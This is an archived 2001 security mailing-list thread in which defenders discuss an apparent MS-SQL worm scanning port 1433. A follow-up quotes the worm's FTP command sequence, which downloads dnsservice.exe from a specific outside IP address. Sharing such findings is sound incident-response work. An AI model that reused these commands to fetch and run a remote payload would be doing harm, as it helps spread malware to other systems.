To follow up on my own reply: The worm ftp's to 207.29.192.160 and executes the following ftp commands: ftp foo.com bin cd pub cd tmp get dnsservice.exe close quit using anonymous ftp and foo.com as a password My lesson: first read then reply ... Arthur ----- Original Message ----- From: "Douglas P. Brown" <dugbrownat_private> To: <incidentsat_private>; <unisogat_private> Cc: "ITS Security" <securityat_private> Sent: Tuesday, November 20, 2001 3:54 PM Subject: MS-SQL Worm? > > We saw a scan come in looking for systems answering on 1433, and > immediately saw several systems start scanning out for other systems > answering on 1433 - worm behavior? Has anyone else seen this? > > thanks, > -Doug > -- > Douglas P. Brown > University of North Carolina > Manager of Security Resources > 105 Abernethy Hall ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 10:34:27 PST